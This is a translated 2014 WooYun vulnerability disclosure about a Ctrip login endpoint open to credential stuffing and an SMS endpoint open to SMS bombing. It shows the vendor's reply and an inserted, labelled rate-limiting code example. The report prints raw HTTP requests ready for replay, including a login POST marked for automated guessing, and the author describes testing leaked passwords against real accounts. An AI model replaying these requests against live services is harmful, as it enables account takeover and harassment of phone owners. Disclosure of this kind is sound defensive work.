Vulnerability summary (24 followers)

Defect ID: wooyun-2014-082848

Title: A Ctrip interface has a defect allowing credential stuffing (partially tested) and SMS bombing

Vendor: Ctrip (携程旅行网)

Author: 0ps

Submitted: 2014-11-11 10:59

Fixed: 2014-12-26 11:00

Published: 2014-12-26 11:00

Type: design flaw / logic error

Severity: Medium

Self-assessed Rank: 15

Status: confirmed by vendor

Source: http://www.wooyun.org; for questions or help contact [email protected]

Tags: (none)


Vulnerability details

Disclosure status:

2014-11-11: Details sent to the vendor, awaiting vendor handling
2014-11-11: Vendor confirmed; details disclosed to the vendor only
2014-11-21: Details disclosed to core white hats and domain experts
2014-12-01: Details disclosed to regular white hats
2014-12-11: Details disclosed to intern white hats
2014-12-26: Details disclosed to the public

Brief description:

Endpoint 1: the login endpoint is unprotected, allowing credential stuffing; large numbers of user passwords can be guessed.
Endpoint 2: the SMS endpoint is not rate-limited, allowing SMS bombing.
And I'd like to say: vendor, look here: $$$

Detailed description:

BUG 1:
Affected endpoint: https://accounts.ctrip.com/globalwap/account/login/
Essentially all the other countries' WAP login pages authenticate here, yet no restriction of any kind is applied.
Request captured during login:

POST /globalwap/account/login/ HTTP/1.1
Host: accounts.ctrip.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: https://accounts.ctrip.com/globalwap/account/login/
Cookie: _abtest_=3341568a-da13-431e-8b37-57b88470cf4c; _bfa=1.1222595445370.18yv31.1.1415607878326.1415670913381.3.426; _jzqco=%7C%7C%7C%7C1415599563950%7C1.1614112599.1415595504733.1415670919253.1415671025719.1415670919253.1415671025719.0.0.0.82.82; __zpspc=9.8.1415670919.1415671025.2%231%7C%7C%7C%7C%7C%23; __utma=1.1094494190.1415595506.1415611614.1415670919.2; __utmz=1.1415611614.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); _ga=GA1.2.10922190.1415595506; LoginStatus=1%7czfhtiysc15im2huhnfiy1jnq480123%2c; Union=AllianceID=10530&SID=333189&OUID=000401app-96; Session=SmartLinkCode=222&SmartLinkKeyWord=&SmartLinkQuary=&SmartLinkHost=&SmartLinkLanguage=zh; zdata=zdata=fbtJpBv9C0ehaHww5dt8ARz60iM=; bid=bid=F; Customer=HAL=ctrip_en; TraceSessionEx=E787F98E577C6F54D7617658F2BF7756; login_type=0; login_uid=920F895E064728DE01786; StartCity_Pkg=PkgStartCity=28; OrderCountForMyCtrip=NotravelOrderCount=0&UnSubmitOrderCount=0&WaitAllReviewCount=0&WaitReviewOrderCount=0&WaitTravelOrderCount=0; WAPACHOST=de.ctrip.com; WAPACLANG=de; WAPACBACK=; __utma=1.1094494192215595506.1415611614.1415670919.2; __utmz=1.14152.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); TracingUserFlag=ab461c5bfe83ae82; TracingErrorFlag=8b15a8523781bcb8; TracingUserFlag=; M133664218=6; _abtest_userid=17f7299f-dac6-459c-bb15-31af7030162d; ticket_ctrip=uoeOwviAJ6VQEgTNwLuTqSV9j/bS+aOP3Riia12QZsD2giTsSgRspVxT9gVTWKAxJ4HkD23fApqQ3QMOE5IaeSosSdj/B3EvFJUBZysEweyWgXWo5xMG3TUgsErz5oLdCian0tw0kzvhAoK6dTc3++u1ZIAWd2eGOCM0/XmfsdolFtzXzgHfvXqOHZ54WcGrBSN2WW2cLo6BkwPpv5BLIPjgaTJ/9x8PPkNgZ/uhrs82GPpb3azYzoaTdBIbzJW6VCLWjA==; corpid=; corpname=; CtripUserInfo=VipGrade=0&UserName=%c2b%aa%ce%fb%ce%fb%22eadMessageCount=0&U=A58C63A452CFD6E6F68962A25FC; AHeadUserInfo=VipGrade=0&UserName=%c2%aa%ce%fb%ce%fb%2f&NoReadMessageCount=0&U=A22CFD6E6F68962A25FC; auto=FD846C1C8F1C7AA17FEA3A964F6A499CB9D01E6030DD50D5; TicketSiteID=SiteID=1005; _bfs=1.7; _bfi=p1%32003%26p2%3D100111%21%3D426%26v2%3D425; __utmb=1.3.10.1415670919; 
__utmc=1; __utmt=1; NSC_WT_Bddpvout_443=ffffffff09001c7445525d5f4f58455e445a4a423660; NSC_WT_Bddpvout_80=ffffffff09001c2045525d5f4f58455e445a4a423660; NSC_WT_bddpvout.hmpcbm_443=ffffffff09001c2b45525d5f4f58455e445a4a423660; __utmb=1.3.10.1415670919; __utmc=1
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 39
UserName=§15555555555§&Password=§111111111§


Here I ran credential stuffing with a password dump leaked on the internet; only a small portion of the data was tested, and the success rate was very high.
BUG 2:
The SMS endpoint is unrestricted, which allows SMS bombing:

GET /card/ajax/AjaxSendCommonSms.aspx?tempid=0.6355477791943324&typeKey=Register&uid=&mp=15555555555&sendType=1 HTTP/1.1
Host: b.ctrip.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0
Accept: */*
Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Referer: http://b.ctrip.com/card/Register/Register3.aspx?phone=13888888888
Cookie: NSC_WT_C_80=fffddd2245525d5f4f58455e445a4a423660; ASP.NET_SessionId=5b3c5m4d0wbddddtgb3m; _abtest_=3341568a-da13-431e-8b37-57b88470cf4c; _bfa=1.1415595445370.18yv31.1.1415dd445370.1415595445370.1.5; _bfs=1.5; _bfi=p1%3D0%26ddd5%26v2%3D4; _jzqco=%7C%7C%7C%7C%7C1.1614112599.1415dd504733.1415595504733.1415595504734.1415dd95504733.1415595504734.0.0.0.1.1; __zpspc=9.1.1415595504.1415595504.1%234%7C%7C%7C%7C%7C%23; __utma=1.1094494190.1415595506.1415595506.1415595506.1; __utmb=1.2.10.1415595506; __utmc=1; __utmz=1.1415595506.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmt=1; corpname=; CoCode=; CtripUserId=; corpid=; _ga=GA1.2.1094494190.1415595506; _gat=1
Connection: keep-alive


This SMS endpoint has no restriction whatsoever.....

Proof of vulnerability:

[Screenshot 1: image not included in this capture]


[Screenshot 2: image not included in this capture]

Fix recommendation:

Add a verification step to the login endpoint.
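The two defects above share one root cause: neither endpoint counts how often it is called. The following is an added example (not part of the original report and not Ctrip's code) of a server-side throttle covering both: per-account and per-IP login attempt limits that fall back to a captcha requirement, and a cooldown plus daily cap per phone number for the SMS endpoint. Function names, limits and windows are assumptions chosen for illustration.

```python
import time
from collections import defaultdict, deque

class Throttle:
    """Sliding-window counter: at most `limit` events per `window` seconds per key."""
    def __init__(self, limit, window, clock=time.monotonic):
        self.limit, self.window, self.clock = limit, window, clock
        self.events = defaultdict(deque)

    def allow(self, key):
        """Record one event for `key`; False once the window is full."""
        now = self.clock()
        q = self.events[key]
        while q and now - q[0] > self.window:
            q.popleft()
        if len(q) >= self.limit:
            return False
        q.append(now)
        return True

# BUG 1: the login endpoint accepted unlimited UserName/Password guesses. Count
# attempts per account (single-account brute force) and per source IP
# (credential-stuffing sweep across many accounts), and demand a captcha once
# the account counter trips. Thresholds are assumptions for illustration.
LOGIN_PER_ACCOUNT = Throttle(limit=5, window=300)
LOGIN_PER_IP = Throttle(limit=50, window=300)

def login_gate(username, client_ip, captcha_ok=False):
    """Return 'ok', 'captcha' (account throttled) or 'blocked' (IP throttled)."""
    if not LOGIN_PER_IP.allow(client_ip):
        return "blocked"
    if not LOGIN_PER_ACCOUNT.allow(username) and not captcha_ok:
        return "captcha"
    return "ok"

# BUG 2: AjaxSendCommonSms.aspx sent a message to whatever number was in `mp`.
# Bind each number to a cooldown and a daily cap before calling the SMS gateway.
SMS_COOLDOWN = Throttle(limit=1, window=60)
SMS_DAILY = Throttle(limit=10, window=86400)

def sms_gate(phone):
    """Return 'ok', 'cooldown' or 'daily_limit' for a send request to `phone`."""
    if not SMS_COOLDOWN.allow(phone):
        return "cooldown"
    if not SMS_DAILY.allow(phone):
        return "daily_limit"
    return "ok"
```

In production the login counters would be fed only by failed attempts and persisted in a shared store (e.g. Redis) so that limits hold across web nodes.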

Copyright notice: when reposting, please credit the source: 0ps@WooYun


Vulnerability response

Vendor response:

Severity: Low

Vulnerability Rank: 1

Confirmed: 2014-11-11 11:53

Vendor reply:

The credential-stuffing vulnerability was already submitted by another white hat on the 7th of this month, so the credential-stuffing vulnerability you submitted can only be handled as ignored.
The SMS-bombing vulnerability has been confirmed to exist and had not been submitted by anyone before.
Many thanks for your submission.

Latest status:

None yet


Vulnerability ratings:

Comments

  1. 2014-11-12 09:24 | wefgod ( Regular white hat | Rank: 1807 | Vulns: 179 | "more will than power" )

    SMS bombing only got Rank 1? You really got shortchanged.

  2. 2014-12-26 11:17 | Mr.leo ( Regular white hat | Rank: 1314 | Vulns: 176 | "What to say!!" )

    SMS bombing only got Rank 1? You really got shortchanged.

  3. 2014-12-26 13:39 | 带我玩 ( Passer-by | Rank: 12 | Vulns: 6 | "Take me along" )

    SMS bombing only got Rank 1? You really got shortchanged.